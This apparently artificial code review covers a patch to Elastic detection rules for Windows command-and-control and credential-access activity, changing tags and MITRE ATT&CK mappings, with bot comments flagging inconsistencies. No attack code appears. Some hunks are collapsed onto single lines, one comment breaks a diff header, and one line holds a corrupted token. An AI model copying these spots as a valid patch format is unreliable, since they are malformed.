-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Command and Control",
+ "Data Source: Elastic Defend",
+ "Resources: Investigation Guide",
+]
 type = "eql"
 query = '''
@@ -82,59 +89,31 @@ Internet Explorer can be manipulated via the Component Object Model (COM) to ini
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1071"
 name = "Application Layer Protocol"
 reference = "https://attack.mitre.org/techniques/T1071/"
-[[rule.threat.technique.subtechnique]]
-id = "T1071.004"
-name = "DNS"
-reference = "https://attack.mitre.org/techniques/T1071/004/"
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
-
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1218"
-name = "System Binary Proxy Execution"
-reference = "https://attack.mitre.org/techniques/T1218/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1218.010"
-name = "Regsvr32"
-reference = "https://attack.mitre.org/techniques/T1218/010/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1218.011"
-name = "Rundll32"
-reference = "https://attack.mitre.org/techniques/T1218/011/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1559"
 name = "Inter-Process Communication"
 reference = "https://attack.mitre.org/techniques/T1559/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1559.001"
 name = "Component Object Model"
 reference = "https://attack.mitre.org/techniques/T1559/001/"
+
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
diff --git a/rules/windows/command_and_control_outlook_home_page.toml b/rules/windows/command_and_control_outlook_home_page.toml
index 78cfe61c520..e584f93e7a1 100644
--- a/rules/windows/command_and_control_outlook_home_page.toml
+++ b/rules/windows/command_and_control_outlook_home_page.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/08/01"
 integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/09/11"
 [rule]
 author = ["Elastic"]
@@ -64,7 +64,20 @@ references = [
 risk_score = 73
 rule_id = "ac5a2759-5c34-440a-b0c4-51fe674611d6"
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Resources: Investigation Guide", "Data Source: Crowdstrike"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Command and Control",
+ "Tactic: Persistence",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: SentinelOne",
+ "Resources: Investigation Guide",
+ "Data Source: Crowdstrike",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -80,17 +93,25 @@ registry where host.os.type == "windows" and event.action != "deletion" and regi
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+[rule.threat.tactic]
+id = "TA0011"
+name = "Command and Control"
+reference = "https://attack.mitre.org/tactics/TA0011/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1137"
 name = "Office Application Startup"
 reference = "https://attack.mitre.org/techniques/T1137/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1137.004"
 name = "Outlook Home Page"
 reference = "https://attack.mitre.org/techniques/T1137/004/"
+
+
 [rule.threat.tactic]
 id = "TA0003"
 name = "Persistence"
 reference = "https://attack.mitre.org/tactics/TA0003/"
+
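Review bot: The added Command and Control `[[rule.threat]]` entry carries only `[rule.threat.tactic]` (TA0011) and no `[[rule.threat.technique]]`, unlike every other entry in this chunk. A tactic-only mapping may be accepted by the schema, but it leaves the tactic with nothing to justify it; if the intent is the remote home-page URL fetch, consider adding the technique the rule actually observes under it (for example T1071.001 Web Protocols, which this series already uses elsewhere), or explain in the PR why the tactic stands alone. The new tables are also inserted with no blank-line separators, unlike the surrounding context.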
diff --git a/rules/windows/command_and_control_port_forwarding_added_registry.toml b/rules/windows/command_and_control_port_forwarding_added_registry.toml
index faf4022a242..0e73d7b7ab7 100644
--- a/rules/windows/command_and_control_port_forwarding_added_registry.toml
+++ b/rules/windows/command_and_control_port_forwarding_added_registry.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/25"
 integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/08/26"
 [rule]
 author = ["Elastic"]
@@ -70,7 +70,20 @@ references = [
 risk_score = 47
 rule_id = "3535c8bb-3bd5-40f4-ae32-b7cd589d5372"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Command and Control",
+ "Tactic: Defense Evasion",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon",
+ "Data Source: SentinelOne",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: Crowdstrike",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -82,18 +95,26 @@ registry where host.os.type == "windows" and event.type == "change" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
-id = "T1090"
-name = "Proxy"
-reference = "https://attack.mitre.org/techniques/T1090/"
+id = "T1572"
+name = "Protocol Tunneling"
+reference = "https://attack.mitre.org/techniques/T1572/"
-[[rule.threat.technique.subtechnique]]
-id = "T1090.001"
-name = "Internal Proxy"
-reference = "https://attack.mitre.org/techniques/T1090/001/"
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+[[rule.threat.technique]]
+id = "T1112"
+name = "Modify Registry"
+reference = "https://attack.mitre.org/techniques/T1112/"
+
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
diff --git a/rules/windows/command_and_control_rdp_tunnel_plink.toml b/rules/windows/command_and_control_rdp_tunnel_plink.toml
index 4a2eba9d304..14e373d6b5f 100644
--- a/rules/windows/command_and_control_rdp_tunnel_plink.toml
+++ b/rules/windows/command_and_control_rdp_tunnel_plink.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/10/14"
 integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [rule]
 author = ["Elastic"]
@@ -91,31 +91,31 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1572"
 name = "Protocol Tunneling"
 reference = "https://attack.mitre.org/techniques/T1572/"
+
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
-
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1021"
 name = "Remote Services"
 reference = "https://attack.mitre.org/techniques/T1021/"
-
 [[rule.threat.technique.subtechnique]]
-id = "T1021.001"
-name = "Remote Desktop Protocol"
-reference = "https://attack.mitre.org/techniques/T1021/001/"
+id = "T1021.004"
+name = "SSH"
+reference = "https://attack.mitre.org/techniques/T1021/004/"
+
+
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
+
diff --git a/rules/windows/command_and_control_remcos_rat_iocs.toml b/rules/windows/command_and_control_remcos_rat_iocs.toml
index 41cfecfa7e0..e7563a52d20 100644
--- a/rules/windows/command_and_control_remcos_rat_iocs.toml
+++ b/rules/windows/command_and_control_remcos_rat_iocs.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/08/20"
 integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/08/20"
 [rule]
 author = ["Elastic"]
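Review bot: The Lateral Movement sub-technique is replaced, T1021.001 Remote Desktop Protocol becoming T1021.004 SSH, yet the file is command_and_control_rdp_tunnel_plink.toml, i.e. RDP carried over an SSH tunnel; dropping RDP entirely loses the mapping that names what is actually being moved laterally. If the query (outside this hunk) still keys on the RDP port, keep the T1021.001 sub-technique and add T1021.004 as a second `[[rule.threat.technique.subtechnique]]` rather than substituting it.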
@@ -53,7 +53,19 @@ references = [
 risk_score = 73
 rule_id = "d8b2f85a-cf1c-40fc-acf0-bb5d588a8ea6"
 severity = "high"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Command and Control",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon",
+ "Data Source: SentinelOne",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: Windows Security Event Logs"
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -79,31 +91,14 @@ any where host.os.type == "windows" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1219"
 name = "Remote Access Tools"
 reference = "https://attack.mitre.org/techniques/T1219/"
+
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1547"
-name = "Boot or Logon Autostart Execution"
-reference = "https://attack.mitre.org/techniques/T1547/"
-
-[[rule.threat.technique.subtechnique]]
-id = "T1547.001"
-name = "Registry Run Keys / Startup Folder"
-reference = "https://attack.mitre.org/techniques/T1547/001/"
-
-[rule.threat.tactic]
-id = "TA0003"
-name = "Persistence"
-reference = "https://attack.mitre.org/tactics/TA0003/"
diff --git a/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml b/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml
index d1f4a1a5e14..82f163f5d20 100644
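Review bot: The rewritten `tags` list ends with `"Data Source: Windows Security Event Logs"` and no trailing comma before `]`, whereas every other multi-line `tags` list in this chunk closes with a trailing comma; add the `,` after the last element so the lists stay uniform. Separately, the later hunk in this file removes the Persistence entry (T1547.001) together with its tag, which is internally consistent, but whether the mapping should go depends on the `any where` query, which is outside this chunk.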
--- a/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml
+++ b/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/09/03"
 integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/03/20"
 [transform]
 [[transform.investigate]]
@@ -144,7 +144,20 @@ references = ["https://labs.sentinelone.com/living-off-windows-land-a-new-native
 risk_score = 47
 rule_id = "15c0b7a7-9c34-4869-b25b-fa6518414899"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Windows Security Event Logs", "Data Source: Microsoft Defender for Endpoint", "Data Source: S# (no change here)entinelOne", "Data Source: Sysmon", "Data Source: Crowdstrike"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Command and Control",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Windows Security Event Logs",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: SentinelOne",
+ "Data Source: Sysmon",
+ "Data Source: Crowdstrike",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -157,26 +170,14 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1105"
 name = "Ingress Tool Transfer"
 reference = "https://attack.mitre.org/techniques/T1105/"
+
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1218"
-name = "System Binary Proxy Execution"
-reference = "https://attack.mitre.org/techniques/T1218/"
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
diff --git a/rules/windows/command_and_control_remote_file_copy_powershell.toml b/rules/windows/command_and_control_remote_file_copy_powershell.toml
index 97d01d5bcb5..a390d17502c 100644
--- a/rules/windows/command_and_control_remote_file_copy_powershell.toml
+++ b/rules/windows/command_and_control_remote_file_copy_powershell.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/30"
 integration = ["endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/03/19"
 [transform]
 [[transform.osquery]]
@@ -128,7 +128,7 @@ PowerShell is one of system administrators' main tools for automation, report ro
 risk_score = 47
 rule_id = "33f306e8-417c-411b-965c-c2812d6d3f4d"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend"]
+tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Resources: Investigation Guide", "Data Source: Elastic Defend"]
 type = "eql"
 query = '''
@@ -161,31 +161,31 @@ sequence by process.entity_id with maxspan=30s
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1105"
 name = "Ingress Tool Transfer"
 reference = "https://attack.mitre.org/techniques/T1105/"
+
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
-
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
-
 [[rule.threat.technique.subtechnique]]
 id = "T1059.001"
 name = "PowerShell"
 reference = "https://attack.mitre.org/techniques/T1059/001/"
+
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
diff --git a/rules/windows/command_and_control_remote_file_copy_scripts.toml b/rules/windows/command_and_control_remote_file_copy_scripts.toml
index fca7770e374..9042a919ec0 100644
--- a/rules/windows/command_and_control_remote_file_copy_scripts.toml
+++ b/rules/windows/command_and_control_remote_file_copy_scripts.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/11/29"
 integration = ["endpoint", "windows"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2026/03/19"
 [transform]
 [[transform.osquery]]
@@ -123,26 +123,31 @@ sequence by host.id, process.entity_id
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1105"
 name = "Ingress Tool Transfer"
 reference = "https://attack.mitre.org/techniques/T1105/"
+
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
-
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1059"
 name = "Command and Scripting Interpreter"
 reference = "https://attack.mitre.org/techniques/T1059/"
+[[rule.threat.technique.subtechnique]]
+id = "T1059.005"
+name = "Visual Basic"
+reference = "https://attack.mitre.org/techniques/T1059/005/"
+
+
 [rule.threat.tactic]
 id = "TA0002"
 name = "Execution"
 reference = "https://attack.mitre.org/tactics/TA0002/"
+
diff --git a/rules/windows/command_and_control_screenconnect_childproc.toml b/rules/windows/command_and_control_screenconnect_childproc.toml
index e23873dfce6..8ae791c89f0 100644
--- a/rules/windows/command_and_control_screenconnect_childproc.toml
+++ b/rules/windows/command_and_control_screenconnect_childproc.toml
@@ -2,7 +2,7 @@
 creation_date = "2024/03/27"
 integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/05/05"
 [rule]
 author = ["Elastic"]
@@ -65,7 +65,20 @@ references = [
 risk_score = 47
 rule_id = "78de1aeb-5225-4067-b8cc-f4a1de8a8546"
 severity = "medium"
-tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Windows Security Event Logs", "Data Source: Crowdstrike"]
+tags = [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Command and Control",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon",
+ "Data Source: SentinelOne",
+ "Data Source: Microsoft Defender for Endpoint",
+ "Data Source: Windows Security Event Logs",
+ "Data Source: Crowdstrike",
+]
 timestamp_override = "event.ingested"
 type = "eql"
@@ -94,26 +107,14 @@ process where host.os.type == "windows" and event.type == "start" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-
 [[rule.threat.technique]]
 id = "T1219"
 name = "Remote Access Tools"
 reference = "https://attack.mitre.org/techniques/T1219/"
+
 [rule.threat.tactic]
 id = "TA0011"
 name = "Command and Control"
 reference = "https://attack.mitre.org/tactics/TA0011/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
diff --git a/rules/windows/command_and_control_sunburst_c2_activity_detected.toml b/rules/windows/command_and_control_sunburst_c2_activity_detected.toml
index 8431bd3c030..53c16e9ff6d 100644
--- a/rules/windows/command_and_control_sunburst_c2_activity_detected.toml
+++ b/rules/windows/command_and_control_sunburst_c2_activity_detected.toml
@@ -2,7 +2,7 @@ creation_date = "2020/12/14" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/03" [transform] [[transform.osquery]] @@ -130,18 +130,36 @@ network where host.os.type == "windows" and event.type == "protocol" and network [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" - [[rule.threat.technique.subtechnique]] id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" + + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1195" +name = "Supply Chain Compromise" +reference = "https://attack.mitre.org/techniques/T1195/" +[[rule.threat.technique.subtechnique]] +id = "T1195.002" +name = "Compromise Software Supply Chain" +reference = "https://attack.mitre.org/techniques/T1195/002/" + + + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/windows/command_and_control_teamviewer_remote_file_copy.toml b/rules/windows/command_and_control_teamviewer_remote_file_copy.toml index 63bb0f13837..3bb1e29bf23 100644 --- a/rules/windows/command_and_control_teamviewer_remote_file_copy.toml +++ b/rules/windows/command_and_control_teamviewer_remote_file_copy.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/19" [transform] [[transform.osquery]] @@ -124,7 +124,6 @@ file where host.os.type == "windows" and event.type == "creation" and process.na [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" 
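Review bot: The new `[[rule.threat]]` entry in `command_and_control_sunburst_c2_activity_detected.toml` introduces a second tactic, `TA0001` Initial Access, but no hunk in this patch touches that rule's `tags` list. The tag list has to carry a matching `"Tactic: Initial Access"` entry for the tag/tactic pairing to stay consistent; if it already has one nothing is needed, otherwise add it. The date hunk for the same file also moves `updated_date` back from `2026/03/23` to `2025/02/03` while content is being added, which looks unintended.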
@@ -135,12 +134,9 @@ id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" -[[rule.threat.technique.subtechnique]] -id = "T1219.001" -name = "IDE Tunneling" -reference = "https://attack.mitre.org/techniques/T1219/001/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/windows/command_and_control_tool_transfer_via_curl.toml b/rules/windows/command_and_control_tool_transfer_via_curl.toml index 0ee101aa41c..760413874e8 100644 --- a/rules/windows/command_and_control_tool_transfer_via_curl.toml +++ b/rules/windows/command_and_control_tool_transfer_via_curl.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/03" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/27" [rule] author = ["Elastic"] @@ -108,23 +108,14 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[[rule.threat.technique.subtechnique]] -id = "T1071.001" -name = "Web Protocols" -reference = "https://attack.mitre.org/techniques/T1071/001/" - [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/windows/command_and_control_tunnel_yuze.toml b/rules/windows/command_and_control_tunnel_yuze.toml index d7edec827c7..a3a6314cc2e 100644 --- a/rules/windows/command_and_control_tunnel_yuze.toml +++ b/rules/windows/command_and_control_tunnel_yuze.toml 
@@ -2,7 +2,7 @@ creation_date = "2026/03/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/18" [rule] author = ["Elastic"] @@ -86,12 +86,6 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1090" -name = "Proxy" -reference = "https://attack.mitre.org/techniques/T1090/" - [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/windows/command_and_control_velociraptor_shell_execution.toml b/rules/windows/command_and_control_velociraptor_shell_execution.toml index 3669963ad8b..e3a239e9797 100644 --- a/rules/windows/command_and_control_velociraptor_shell_execution.toml +++ b/rules/windows/command_and_control_velociraptor_shell_execution.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "system", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/18" [rule] author = ["Elastic"] 
@@ -55,7 +55,22 @@ references = [ risk_score = 47 rule_id = "9aeca498-1e3d-4496-9e12-6ef40047eb23" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Execution", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Data Source: Elastic Endgame", "Data Source: Windows Security Event Logs"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Tactic: Execution", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Data Source: Elastic Endgame", + "Data Source: Windows Security Event Logs" +] timestamp_override = "event.ingested" type = "eql" 
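Review bot: The rewritten `tags` list in `command_and_control_velociraptor_shell_execution.toml` puts `"Data Source: Windows Security Event Logs"` and `]` on separate lines with no trailing comma, whereas every other multi-line tags list in this patch ends `"...",` before `]`. Both are valid TOML, but the other lists suggest the repository's writer emits the trailing-comma form, so this one will be rewritten on the next round-trip and produce noise. Add the comma: `"Data Source: Windows Security Event Logs",`.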
@@ -75,36 +90,17 @@ process where host.os.type == "windows" and event.type == "start" and process.co [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1219" name = "Remote Access Tools" reference = "https://attack.mitre.org/techniques/T1219/" +[[rule.threat.technique.subtechnique]] +id = "T1219.002" +name = "Remote Desktop Software" +reference = "https://attack.mitre.org/techniques/T1219/002/" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.001" -name = "PowerShell" -reference = "https://attack.mitre.org/techniques/T1059/001/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.003" -name = "Windows Command Shell" -reference = "https://attack.mitre.org/techniques/T1059/003/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/credential_access_adidns_wildcard.toml b/rules/windows/credential_access_adidns_wildcard.toml index 6a18ecf1e11..e3c6af87519 100644 --- a/rules/windows/credential_access_adidns_wildcard.toml +++ b/rules/windows/credential_access_adidns_wildcard.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/26" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
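Review bot: After this hunk the only `[rule.threat.tactic]` left in the file is `TA0011` Command and Control (the hunk runs to end of file and removes the entire T1059 / Execution entry), yet the tags hunk above keeps `"Tactic: Execution"` and adds `"Tactic: Defense Evasion"`. Those two tags are now orphans with no threat mapping behind them, which a tag/tactic consistency check will flag. Either drop both tags or keep the Execution block; given the rule is named `velociraptor_shell_execution`, retaining the removed `[[rule.threat]]` T1059 entry looks like the intended state. Separately, `T1219.002 Remote Desktop Software` for Velociraptor (a DFIR agent rather than desktop-sharing software) reads as a stretch; the parent `T1219` alone may be the safer mapping.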
@@ -83,7 +83,16 @@ Set-AuditRule -AdObjectPath 'AD:\\CN=MicrosoftDNS,DC=DomainDNSZones,DC=Domain,DC ``` """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Active Directory", "Use Case: Active Directory Monitoring", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Active Directory", + "Use Case: Active Directory Monitoring", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -95,26 +104,14 @@ any where host.os.type == "windows" and event.code == "5137" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1557" name = "Adversary-in-the-Middle" reference = "https://attack.mitre.org/techniques/T1557/" -[rule.threat.tactic] -id = "TA0009" -name = "Collection" -reference = "https://attack.mitre.org/tactics/TA0009/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1557" -name = "Adversary-in-the-Middle" -reference = "https://attack.mitre.org/techniques/T1557/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/credential_access_browsers_unusual_parent.toml b/rules/windows/credential_access_browsers_unusual_parent.toml index 44ceeb7b2a5..7ba940e2c6d 100644 --- a/rules/windows/credential_access_browsers_unusual_parent.toml +++ b/rules/windows/credential_access_browsers_unusual_parent.toml @@ -2,7 +2,7 @@ creation_date = "2025/08/27" integration = 